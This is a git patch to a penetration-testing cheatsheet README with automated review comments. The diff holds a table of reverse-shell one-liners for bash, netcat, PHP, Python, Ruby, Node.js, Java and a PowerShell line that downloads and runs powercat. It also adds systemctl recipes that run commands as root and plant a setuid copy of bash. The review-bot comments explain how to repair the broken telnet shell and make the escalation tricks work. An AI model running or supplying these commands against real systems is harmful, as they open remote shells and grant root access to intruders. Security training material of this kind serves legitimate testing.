From 26eabd49259daa2de37a1f01d6094a86705f1dfa Mon Sep 17 00:00:00 2001
From: Phil
Date: Tue, 28 Dec 2021 16:51:40 +0000
Subject: [PATCH] Added quick SUID to Cheatsheet
---
 README.md | 70 +++++++++++++++++++++++++++++++++++++++++++------------
 1 file changed, 55 insertions(+), 15 deletions(-)
diff --git a/README.md b/README.md
index 12ce723..8e87700 100644
--- a/README.md
+++ b/README.md
@@ -331,19 +331,19 @@ function printit ($string) {
 | Program | Command |
 |----------|---------|
-| Netcat Listen | ncat -vlnp 4444 |
+| Netcat Listen | ncat -lvnp 4444 |
 | Bash | bash -i >& /dev/tcp/IP/4444 0>&1 |
 | Bash | bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1' |
-| PHP | php -r '$sock=fsockopen("^IP^",5566);exec("/bin/sh -i <&3 >&3 2>&3");'` |
-| Netcat Connect | nc -e /bin/sh ^IP^ 5566`|
-| Telnet | mknod backpipe p && telnet ^IP^ 5566 0backpipe` |
-| Python | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` |
-| Ruby | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` |
-| Node.js | var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); |
-| | require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/5566 0>&1'");` |
+| PHP | php -r '$sock=fsockopen("^IP^",4444);exec("/bin/sh -i <&3 >&3 2>&3");'` |
+| Netcat Connect | nc -e /bin/sh ^IP^ 4444`|
+| Telnet | mknod backpipe p && telnet ^IP^ 4444 0backpipe` |
+| Python | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` |
+| Ruby | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` |
+| Node.js | var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(4444, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); |
+| | require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/4444 0>&1'");` |
 | Java | Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();` |
 | Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html |
-| Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd |
+| Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 4444 -e cmd |
@@ -392,7 +392,7 @@ export TERM=xterm
 ### Lets Have a Look Around
-* PEASS-ng
+##### PEASS-ng
 | OS | Links |
 |----|------|
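Review bot: The re-added Telnet row `| Telnet | mknod backpipe p && telnet ^IP^ 4444 0backpipe` |` is not a working command: the named pipe created by `mknod` is never read or written and `0backpipe` reaches telnet as a stray argument, so the redirections and the pipe into a shell appear to have been lost (likely the `<`, `|` and `>` characters were stripped when the table was edited). The usual form is `mknod backpipe p && telnet ^IP^ 4444 0<backpipe | /bin/bash 1>backpipe`, and a literal `|` inside a markdown table cell has to be written `\|` or the row splits. The placeholders are also inconsistent within the hunk: the Bash, Python and Java rows use `IP` while the rest use `^IP^`, so a find-and-replace of `^IP^` silently leaves three payloads pointing at a literal `IP`; pick one form. The trailing backticks on several rows (`4444`|`, `0>&1'");` |`) look like leftovers of code-span formatting and render as literal characters.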
@@ -400,15 +400,55 @@ export TERM=xterm
 | Windows x68 | https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe |
 |Windows x86 | https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe |
-* GTFObins
-
-> https://gtfobins.github.io/
-* Linux Tools
+### Escalate Privileges
+
+
+##### SUID
+
+* Find SUID Files
 | Command| Discription |
 |--------|-------------|
-| find / -type f -user root -perm -4000 2>/dev/null | Find SUID Files |
+| find / -user root -perm -4000 2>/dev/null | Find SUID Files |
+
+
+* SUID Cheatsheet
+ * systemctl
+```
+cd /tmp
+TF=$(mktemp).service
+echo '[Service]
+Type=oneshot
+ExecStart=/bin/sh -c "COMMAND HERE"
+[Install]
+WantedBy=multi-user.target' > $TF
+systemctl link $TF
+systemctl enable --now $TF
+```
+ * Create a Service that will give `/bin/bash` a Root SUID
+```
+cd /tmp
+TF=$(mktemp).service
+echo '[Service]
+Type=oneshot
+ExecStart=/bin/sh -c "cp /bin/bash /tmp/bash;chmod +s /tmp/bash"
+[Install]
+WantedBy=multi-user.target' > $TF
+systemctl link $TF
+systemctl enable --now $TF
+/tmp/bash -p
+```
+
+
+Search [GTFO Bins](https://gtfobins.github.io/) for exploits
+
+
+
+
+##### Linux Tools
+
+
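Review bot: Both new systemctl blocks run `systemctl link $TF` and `systemctl enable --now $TF` from `$PATH`, but under the `SUID` heading the trick only works when the binary executed is the SUID-root systemctl turned up by the `find` line above; the GTFOBins recipe this appears to follow uses `./systemctl link $TF` / `./systemctl enable --now $TF` from that binary's directory, and a stock non-SUID systemctl will simply fail or hit polkit. Suggest writing the invocation as `/path/to/suid/systemctl link $TF` and saying so in the `* systemctl` bullet. The second block's `chmod +s /tmp/bash` followed by `/tmp/bash -p` also needs a caveat: `/tmp` is commonly mounted `nosuid`, in which case the setuid bit is ignored and `-p` still yields an unprivileged shell, so add a line like `# if /tmp is nosuid, copy bash to another writable directory instead`. Finally, the changed find line keeps `-user root`, so SUID binaries owned by other accounts (still a lateral-move path) are never listed; `find / -perm -4000 -type f 2>/dev/null` is the more complete sweep, and `Discription` in the table header above it is misspelled.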